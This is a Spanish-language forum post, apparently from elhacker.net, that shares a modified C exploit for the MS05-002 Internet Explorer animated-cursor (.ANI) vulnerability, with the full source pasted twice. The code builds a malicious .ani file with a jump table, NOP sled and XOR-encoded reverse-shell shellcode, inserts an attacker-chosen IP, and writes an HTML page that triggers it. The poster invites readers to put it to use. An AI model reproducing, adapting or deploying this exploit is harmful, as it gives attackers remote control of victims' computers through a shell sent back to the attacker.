Autor
La shellcode es la misma de exploit GDI+ y la misma que usamos Gospel y yo en la modificación del bug del IFRAME.
Espero que le saqueis partido al exploit..
Código:
/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
*
* Copyright (c) 2004-2005 houseofdabus, (modificado por LoReDo para elhacker.net).
* Compilado con VC++ 6
*
* (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
* (CAN-2004-1049)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (universal -- for all affected systems)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the way that
* cursor, animated cursor, and icon formats are handled. An attacker
* could try to exploit the vulnerability by constructing a malicious
* cursor or icon file that could potentially allow remote code
* execution if a user visited a malicious Web site or viewed a
* malicious e-mail message. An attacker who successfully exploited
* this vulnerability could take complete control of an affected
* system.
*
* ---------------------------------------------------------------------
* Patch:
* http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows Server 2003
* - Windows XP SP1
* - Windows XP SP0
* - Windows 2000 SP4
* - Windows 2000 SP3
* - Windows 2000 SP2
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:\>
*
* start IE -> C:\poc.html
*
* C:\>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\Documents and Settings\Administrator\Desktop>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/* reverse shellcode */
unsigned char shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\x52" //x52 es el primer número de la IP
"\x3A\x93\xB0\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7" //IP por defecto: 192.168.1.34 XOREADA con 0x92
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54" //: 52.3A.93.B0
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";
unsigned char html[] =
"<html>\n"
"<head>\n"
"\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n"
"\t</style>"
"\n</head>\n"
"</html>";
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <filehtml> <reverse IP>\n\n", prog);
exit(0);
}
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
int
main(int argc, char **argv)
{
FILE *fp;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
int raw_num = 0;
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
printf("\tCopyright (c) 2004-2005 .: houseofdabus (modificado por LoReDo) :.\n");
printf("\t.:Para elhacker.net:.\n\n\n");
printf("Tested on all affected systems:\n");
printf(" [+] Windows Server 2003\n [+] Windows XP SP1, SP0\n");
printf(" [+] Windows 2000 All SP\n\n");
printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);
if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}
/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
memset(anib, 0x90, 912);
/* header */
memcpy(anib, aniheader, sizeof(aniheader)-1);
/* shellcode */
// copia el argumento 2 (IP) a ip_addr
strncpy(ip_addr, argv[2], 20);
// Va XOREANDO cada trozo de IP con 0x92 y lo pega en la posición correspondiente de la shellcode
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
shellcode[182] = xor_data((char)raw_num);
memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);
fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);
/* creating html file */
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
sprintf(anib, html, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);
return 0;
}
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
*
* Copyright (c) 2004-2005 houseofdabus, (modificado por LoReDo para elhacker.net).
* Compilado con VC++ 6
*
* (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
* (CAN-2004-1049)
*
*
*
* .::[ houseofdabus ]::.
*
*
*
* (universal -- for all affected systems)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the way that
* cursor, animated cursor, and icon formats are handled. An attacker
* could try to exploit the vulnerability by constructing a malicious
* cursor or icon file that could potentially allow remote code
* execution if a user visited a malicious Web site or viewed a
* malicious e-mail message. An attacker who successfully exploited
* this vulnerability could take complete control of an affected
* system.
*
* ---------------------------------------------------------------------
* Patch:
* http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows Server 2003
* - Windows XP SP1
* - Windows XP SP0
* - Windows 2000 SP4
* - Windows 2000 SP3
* - Windows 2000 SP2
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
* Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05002-ani-expl.exe poc 7777
* <...>
* [*] Creating poc.ani file ... Ok
* [*] Creating poc.html file ... Ok
*
* C:\>
*
* start IE -> C:\poc.html
*
* C:\>telnet localhost 7777
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\Documents and Settings\Administrator\Desktop>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
/* reverse shellcode */
unsigned char shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\x52" //x52 es el primer número de la IP
"\x3A\x93\xB0\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7" //IP por defecto: 192.168.1.34 XOREADA con 0x92
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54" //: 52.3A.93.B0
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";
unsigned char html[] =
"<html>\n"
"<head>\n"
"\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n"
"\t</style>"
"\n</head>\n"
"</html>";
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <filehtml> <reverse IP>\n\n", prog);
exit(0);
}
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
int
main(int argc, char **argv)
{
FILE *fp;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
int raw_num = 0;
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
printf("\tCopyright (c) 2004-2005 .: houseofdabus (modificado por LoReDo) :.\n");
printf("\t.:Para elhacker.net:.\n\n\n");
printf("Tested on all affected systems:\n");
printf(" [+] Windows Server 2003\n [+] Windows XP SP1, SP0\n");
printf(" [+] Windows 2000 All SP\n\n");
printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);
if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}
/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
memset(anib, 0x90, 912);
/* header */
memcpy(anib, aniheader, sizeof(aniheader)-1);
/* shellcode */
// copia el argumento 2 (IP) a ip_addr
strncpy(ip_addr, argv[2], 20);
// Va XOREANDO cada trozo de IP con 0x92 y lo pega en la posición correspondiente de la shellcode
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
shellcode[182] = xor_data((char)raw_num);
memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);
fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);
/* creating html file */
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
sprintf(anib, html, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);
return 0;
}
Un saludo^^
En línea
